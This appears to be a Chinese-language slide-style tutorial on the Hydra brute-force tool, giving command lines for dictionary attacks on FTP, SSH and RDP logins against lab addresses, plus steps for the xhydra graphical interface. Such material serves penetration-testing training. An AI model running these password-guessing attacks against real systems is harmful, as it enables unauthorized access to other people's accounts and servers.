内容:
简介
查看帮助
参数说明
Hydra的使用—爆破FTP 服务
图形界面
破解3389 远程桌面连接
破解SSH 服务
Hydra—简介
• hydra著名黑客组织THC的一款开源的暴力破解工具。
• Hydra 支持多平台版本
• 对需要网络登录的系统进行快速的字典攻击—在线攻击。
• 支持大量的服务,包括FTP/POP3/IMAP/Telnet/SSH 等。
Hydra—查看帮助
命令
hydra -h
Hydra—参数说明
Hydra—爆破FTP 服务
- 使用字典
使用事先准备好的用户名字典和密码字典 - 基本命令
hydra -l msfadmin -P password.dic 10.10.10.254 ftp
-l 指定用户名
-P 指定密码字典
server
services
指定用户名字典
hydra -L username.dic -P password.dic 10.10.10.254 ftp
显示详细信息
hydra -l msfadmin -P password.dic 10.10.10.254 ftp -vV
[-e] 参数
hydra -l msfadmin -P password.dic 10.10.10.254 -vV -e nsr
将结果输出到文件
hydra -l msfadmin -P password.dic 10.10.10.254 ftp -e nsr -oresult.out
使用地址列表
hydra -l msfadmin -P password.dic –M tatgets ftp -e nsr -oresult.out
适时停止
hydra -L username.dic -P password.dic -M targets ftp -vV -e nsr -F
hydra -L username.dic -P password.dic -M targets ftp -vV -e nsr -f
Hydra—图形界面
启动
xhydra
填写配置
• 目标地址
• 端口号
• 协议类型
• 显示详细过程
填写配置
• 用户名(已知)
• 密码字典
• 用户名作为密码
• 空密码
• 用户名倒写
填写配置
• 默认即可
填写配置
• 点击【start】
• 等待。。。
• 查看结果
Hydra—破解3389 远程桌面连接
hydra -l administrator -P ./dic/commonPsd.txt 10.10.10.130 rdp -vV -e nsr
Hydra—破解SSH 服务
hydra -l msfadmin -P ./dic/commonPsd.txt 10.10.10.254 ssh -vV -e nsr
